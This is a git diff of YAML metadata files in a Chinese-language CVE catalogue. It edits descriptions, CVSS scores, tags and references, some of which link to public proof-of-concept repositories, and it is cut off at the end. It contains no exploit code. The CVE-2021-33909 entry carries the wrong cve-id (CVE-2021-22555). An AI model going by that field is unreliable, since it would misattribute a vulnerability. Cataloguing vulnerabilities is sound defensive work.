a/cve/django/2022/yaml/CVE-2022-28346.yaml b/cve/django/2022/yaml/CVE-2022-28346.yaml index 739255fff6f5b8d6e75670786a6c6b899fed0afa..4a569da521b44bddf4cc543ff6e318bec4ea1736 100644 --- a/cve/django/2022/yaml/CVE-2022-28346.yaml +++ b/cve/django/2022/yaml/CVE-2022-28346.yaml @@ -1,6 +1,5 @@ id: CVE-2022-28346 -source: - https://github.com/DeEpinGh0st/CVE-2022-28346 +source: https://github.com/DeEpinGh0st/CVE-2022-28346 info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: critical diff --git a/cve/django/2022/yaml/CVE-2022-34265.yaml b/cve/django/2022/yaml/CVE-2022-34265.yaml index ff899811dc3fbd6d847f68c27ebc5f0c2cdbaf87..48efa4d16b64cf812e7e9ab04fc13a73216fc45d 100644 --- a/cve/django/2022/yaml/CVE-2022-34265.yaml +++ b/cve/django/2022/yaml/CVE-2022-34265.yaml @@ -1,6 +1,5 @@ id: CVE-2022-34265 -source: - https://github.com/aeyesec/CVE-2022-34265 +source: https://github.com/aeyesec/CVE-2022-34265 info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: critical diff --git a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md b/cve/docker/2019/CVE-2019-16884/ReadMe.md similarity index 100% rename from cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md rename to cve/docker/2019/CVE-2019-16884/ReadMe.md diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/docker/2019/yaml/CVE-2019-16884.yaml similarity index 70% rename from cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml rename to cve/docker/2019/yaml/CVE-2019-16884.yaml index 0f38b7149b264c59bb0cdb25337e642a9d9b21a9..5cd9d93fb706c132110ce9194ae733bff8aed61f 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml +++ b/cve/docker/2019/yaml/CVE-2019-16884.yaml @@ -1,7 +1,7 @@ id: CVE-2019-16884 source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md info: - name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 severity: high description: | runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory @@ -12,11 +12,11 @@ info: Red Hat OpenShift Container Platform 4.2 Red Hat OpenShift Container Platform 3.9 reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 - - https://usn.ubuntu.com/usn/usn-4297-1 - - https://security.netapp.com/advisory/ntap-20220221-0004/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 + - https://usn.ubuntu.com/usn/usn-4297-1 + - https://security.netapp.com/advisory/ntap-20220221-0004/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2019-16884 cwe-id: CWE-863 diff --git a/cve/docker/2019/yaml/CVE-2019-5736.yaml b/cve/docker/2019/yaml/CVE-2019-5736.yaml index fefd75ac700c9b8b9191aa595c22d18c9bcaf529..ac62cd4cff045327666e79725e20433d816e7704 100644 --- a/cve/docker/2019/yaml/CVE-2019-5736.yaml +++ b/cve/docker/2019/yaml/CVE-2019-5736.yaml @@ -10,7 +10,7 @@ info: RunC version <=1.0-rc6 reference: - https://www.4hou.com/vulnerable/16361.html - - https://github.com/Frichetten/CVE-2019-5736-PoC\ + - https://github.com/Frichetten/CVE-2019-5736-PoC classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 8.6 @@ -18,4 +18,4 @@ info: cwe-id: CWE-78 cnvd-id: None kve-id: None - tags: cve2019,docker.runc \ No newline at end of file + tags: cve2019, docker.runc \ No newline at end of file diff --git a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml index 98f30f02ba92e521ad0838c5cfcfde8a71db96b7..6774e5011a3502b0c25e2f675f2dfdcb86b55435 100644 --- a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml @@ -19,7 +19,7 @@ info: - https://www.fortiguard.com/psirt/FG-IR-22-300 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-610 diff --git a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml index e3d36c9d323bde72ea06faa144e69dcb2830f5e0..3ef4584fa603deb73db37fac63f43b4152a559c7 100644 --- a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml +++ b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-94 cnvd-id: None kve-id: None - tags: RCE,cve2021,gitlab \ No newline at end of file + tags: RCE, cve2021, gitlab \ No newline at end of file diff --git a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml index 37a69cb5a0ff4a231a62e1afda510e65544366b1..1ba01452468f53613e49c7a42e3a294e1bdc1ef6 100644 --- a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml +++ b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml @@ -14,7 +14,7 @@ info: - https://www.tenable.com/plugins/nessus/152483 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22214 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2021-22214 cwe-id: CWE-918 diff --git a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml index 7d7575e2c31bb5d68106ca8acc26709ec971e314..3baa322fe6110a77878aa2ce3b9585fd4974250a 100644 --- a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml +++ b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-798 cnvd-id: None kve-id: None - tags: UseOfHardCodedPassword,cve2022,gitlab \ No newline at end of file + tags: UseOfHardCodedPassword, cve2022, gitlab \ No newline at end of file diff --git a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml index 430b5e70481660950ae56c2511757b75d304fbc9..ba1e0879b9b49da6b14ec945b64599b92c5d4cec 100644 --- a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml +++ b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml @@ -1,6 +1,5 @@ id: CVE-2022-22978 -source: - https://github.com/DeEpinGh0st/CVE-2022-22978 +source: https://github.com/DeEpinGh0st/CVE-2022-22978 info: name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。 severity: critical @@ -13,7 +12,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22978 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22978 cwe-id: CWE-863, CWE-285 diff --git a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml index c6b5f60832ff2b547f187747a4c930ad1f429c6e..6cc798ff65a29d031b386cd4f502542c49d65475 100644 --- a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml +++ b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml @@ -1,6 +1,5 @@ id: CVE-2017-8046 -source: - https://github.com/m3ssap0/spring-break_cve-2017-8046 +source: https://github.com/m3ssap0/spring-break_cve-2017-8046 info: name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 severity: high @@ -12,7 +11,7 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8046 cwe-id: CWE-20 diff --git a/cve/java-spring/2020/yaml/CVE-2020-5398.yaml b/cve/java-spring/2020/yaml/CVE-2020-5398.yaml index ef202c2e1a046395a4f9c6ea7e1d3b8fc85325b5..0838f5044a5d04239efc1575e8c87bfaee095c91 100644 --- a/cve/java-spring/2020/yaml/CVE-2020-5398.yaml +++ b/cve/java-spring/2020/yaml/CVE-2020-5398.yaml @@ -1,6 +1,5 @@ id: CVE-2020-5398 -source: - https://github.com/motikan2010/CVE-2020-5398 +source: https://github.com/motikan2010/CVE-2020-5398 info: name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 severity: high @@ -14,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-5398 - https://pivotal.io/security/cve-2020-5398 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.5 cve-id: CVE-2020-5398 cwe-id: CWE-494, CWE-79 diff --git a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml index 496e1ad2d42eaa6e71f2eb46046c8a05838806e7..251d88ac2b7625aaf4954c65563d8113faab58d3 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml @@ -4,7 +4,8 @@ info: name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 severity: critical description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。 - scope-of-influence: Spring Cloud Function<3.1.7 + scope-of-influence: + Spring Cloud Function<3.1.7 reference: - https://github.com/dinosn/CVE-2022-22963 - https://avd.aliyun.com/search?q=CVE-2022-22963 diff --git a/cve/java-spring/2022/yaml/CVE-2022-22965.yaml b/cve/java-spring/2022/yaml/CVE-2022-22965.yaml index e237d738a619f3cd6422b9d4cec55f4810f7b69d..c7aca8ce6c32ebb03a76c8988673e2cd470ec950 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-22965.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22965.yaml @@ -4,7 +4,8 @@ info: name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 severity: critical description: 2022年3月31日,Spring官方发布安全公告,披露CVE-2022-22965 Spring Framework 远程代码执行漏洞。由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。使用Spring框架或衍生框架构建网站等应用,且同时使用JDK版本在9及以上版本的,易受此漏洞攻击影响。 - scope-of-influence: Spring Framework <5.2.20 and JDK >=9 + scope-of-influence: + Spring Framework <5.2.20 and JDK >=9 reference: - https://help.aliyun.com/noticelist/articleid/1061022382.html - https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement diff --git a/cve/java-spring/2022/yaml/CVE-2022-31692.yaml b/cve/java-spring/2022/yaml/CVE-2022-31692.yaml index d6ed1a5ee9ec25bd07c4f3d5373a415dd4799f21..2cf4e7e31e8fbf31c773ac03daa0f094037c8090 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-31692.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-31692.yaml @@ -4,7 +4,8 @@ info: name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。它提供了一组可以在Spring应用上下文中配置的Bean,充分利用了Spring IoC,DI(控制反转Inversion of Control ,DI:Dependency Injection 依赖注入)和AOP(面向切面编程)功能,为应用系统提供声明式的安全访问控制功能,减少了为企业系统安全控制编写大量重复代码的工作。 severity: critical description: CVE-2022-31692 中,在Spring Security受影响版本范围内,在使用forward/include进行转发的情况下可能导致权限绕过。 - scope-of-influence: 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8 + scope-of-influence: + 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-31692 - https://github.com/ARPSyndicate/cvemon diff --git a/cve/joomla/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml index 40166d53c33fda981f00d1bf7dbe83950f4061d0..a8b610b78abb795cd733a4414586c438438a39f4 100644 --- a/cve/joomla/2023/yaml/CVE-2023-23752.yaml +++ b/cve/joomla/2023/yaml/CVE-2023-23752.yaml @@ -1,6 +1,5 @@ id: CVE-2023-23752 -source: - https://github.com/Jenderal92/Joomla-CVE-2023-23752 +source: https://github.com/Jenderal92/Joomla-CVE-2023-23752 info: name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。 severity: medium @@ -17,5 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - 非法访问 \ No newline at end of file + tags: 非法访问 \ No newline at end of file diff --git a/cve/libxml2/2020/yaml/CVE-2020-24977.yaml b/cve/libxml2/2020/yaml/CVE-2020-24977.yaml index edf411d2d3608c1001d7fcb2a0ff8ddd8a9d350c..53eb74568e842724f7d0d500f29585e921357533 100644 --- a/cve/libxml2/2020/yaml/CVE-2020-24977.yaml +++ b/cve/libxml2/2020/yaml/CVE-2020-24977.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2020,缓冲区错误 \ No newline at end of file + tags: cve2020, 缓冲区错误 \ No newline at end of file diff --git a/cve/libxml2/2021/yaml/CVE-2021-3517.yaml b/cve/libxml2/2021/yaml/CVE-2021-3517.yaml index d215f84e69159e87e6c5840c7f06d3b0b7a5e2e9..82c243eb72ca1198038c2bb0dad104d4c8833294 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3517.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3517.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 中entities.c存在缓冲区错误漏洞,该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3517 classification: @@ -16,4 +16,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: cve2021,缓冲区错误 \ No newline at end of file + tags: cve2021, 缓冲区错误 \ No newline at end of file diff --git a/cve/libxml2/2021/yaml/CVE-2021-3518.yaml b/cve/libxml2/2021/yaml/CVE-2021-3518.yaml index 54dd1885d72c56a1c7bd738e0e46846ff5252e98..33a05a166f1203940aa7978b3bfad2e3ec979f80 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3518.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3518.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 中xinclude.c存在资源管理错误漏洞,该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3518 classification: diff --git a/cve/libxml2/2021/yaml/CVE-2021-3537.yaml b/cve/libxml2/2021/yaml/CVE-2021-3537.yaml index f2db176b18b5241719597e164e7240a1b18cfa03..9302a38011a49ba7af16a17af1349d37dce29685 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3537.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3537.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 存在代码问题漏洞,攻击者可利用该漏洞使应用程序崩溃。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3537 classification: diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml index 2442cf53bf25b63bd754c9e28f7caa1c270bf1d0..f22083e2ea6224032ab5d7c473e0fec92562c602 100644 --- a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml @@ -1,18 +1,18 @@ id: CVE-2011-4916 source: https://www.openwall.com/lists/oss-security/2011/11/05/3 info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: medium - description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 - scope-of-influence: - Linux kernel <= 3.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2011-4916 - cwe-id: CWE-200 - cnvd-id: None - kve-id: None - tags: information disclosure \ No newline at end of file + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4916 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml index 255ddd173e3737598d270fdce0240ab6d91aafd4..d4817b0509bbfeda12f621b29e969d124beba662 100644 --- a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml @@ -1,18 +1,18 @@ id: CVE-2011-4917 source: https://www.openwall.com/lists/oss-security/2011/11/07/9 info: - name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 - severity: medium - description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 - scope-of-influence: - Linux kernel <= 3.1 - reference: - - https://nvd.nist.gov/vuln/detail/cve-2011-4917 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2011-4917 - cwe-id: CWE-200 - cnvd-id: None - kve-id: None - tags: information disclosure \ No newline at end of file + name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 + severity: medium + description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2011-4917 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4917 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml index 797969a37fd3df1241ab80e7bf7fc240775840ba..40cfccc89e6ade1d0e32289f61e33ff49f164dfa 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml @@ -37,6 +37,7 @@ info: - https://usn.ubuntu.com/4117-1/ - https://usn.ubuntu.com/4118-1/ - https://www.debian.org/security/2019/dsa-4484 + classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2019-13272 diff --git a/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml b/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml index 6a480aa959a818de90dca7390072ff81bd2f9063..c8a242be574c869f1ca7e456ef56b0224ef5bc24 100644 --- a/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml +++ b/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml @@ -2,7 +2,7 @@ id: CVE-2020-12351 source: https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 + severity: High description: | Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access. scope-of-influence: diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml index 2be396cf3001c161023ec2893cc8c0d3c31161a9..803cefb38b3f3dd526ab741bdadfd5ef0de6c408 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml @@ -6,15 +6,17 @@ info: description: | Linux Netfilter模块在实现IPT_SO_SET_REPLACE(或IP6T_SO_SET_REPLACE)setsockopt时,存在堆越界写入漏洞。该漏洞将允许本地用户通过用户名空间获取权限提升,在kCTF中被用于攻击Kubernetes Pod容器,实现容器逃逸。该漏洞已在Linux内核代码中存在15年。 scope-of-influence: - v2.6.19-rc1~v5.12-rc7 + v2.6.19-rc1 ≤ Linux-Kernel ≤ v5.12-rc7 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2021-22555 - https://nvd.nist.gov/vuln/detail/CVE-2021-22555 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=9fa492cdc160cd27ce1046cb36f47d3b2b1efa21 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=b29c457a6511435960115c0f548c4360d5f4801d classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-22555 cwe-id: CWE-787 - tags: cve2021,权限提升,容器逃逸 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升, 容器逃逸 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml index e4014448e7c2c47c71e795b30d93aa8094d506d6..3355d61cf93a19a4986c3da8479bd78babb04801 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml @@ -11,8 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/cve-2021-26708 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26708 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.0 cve-id: CVE-2021-26708 cwe-id: CWE-667 + cnvd-id: None + kve-id: None tags: 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml index 4c330eb45bb0a98216eaf52585f12ced64c67df2..1047549c32368b04c47ff2e6a8f411baf9b2733b 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml @@ -11,7 +11,7 @@ info: - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PAEQ3H6HKNO6KUCGRZVYSFSAGEUX23JL/ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CUX2CA63453G34C6KYVBLJXJXEARZI2X/ classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-29155 cwe-id: CWE-125 diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml index bdb280f20a259f99796df27d00e93fcf71fb04d5..e4d4734ca6afd99f0b8865a36c85d9028ca8cdc0 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml @@ -5,11 +5,9 @@ info: severity: medium description: | 在Linux内核的kernel/bpf/verifier.c 中,可以预测一个分支(例如,因为类型的混淆),因此一个非特权BPF程序可以通过边信道攻击读取任意内存位置,又名CID-9183671af6db。 - scope-of-influence: Red Hat Enterprise Linux 8 - Linux kernel before 5.12.13 - + Linux kernel < 5.12.13 reference: - https://access.redhat.com/security/cve/CVE-2021-33624 - https://ubuntu.com/security/CVE-2021-33624 @@ -17,7 +15,6 @@ info: - https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html - https://github.com/torvalds/linux/commit/9183671af6dbf60a1219371d4ed73e23f43b49db - http://www.openwall.com/lists/oss-security/2021/06/21/1 - classification: cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.7 @@ -25,5 +22,4 @@ info: cwe-id: CWE-203 cnvd-id: None kve-id: None - tags: 内存泄露, 侧信道攻击 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml index f58af1c4db5e265d3058d3b7f310f08aa7b638bf..efe2294b4af99e6883e6f548e4a81509be0fe826 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml @@ -15,4 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2021-22555 cwe-id: CWE-120 - tags: cve2021,权限提升 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml index ade74c393fc1cc591e6941b4aa727e4697294643..82972aa003838e195fbabfc63659abb9b39093ab 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml @@ -11,13 +11,15 @@ info: Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM - (Linux-kernel < 5.11) + Linux-kernel < 5.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3493 - https://ubuntu.com/security/notices/USN-4917-1 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3493 - cwe-id: CWE-269, CEW-270 - tags: cve2021,权限提升 \ No newline at end of file + cwe-id: CWE-269, CWE-270 + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml index 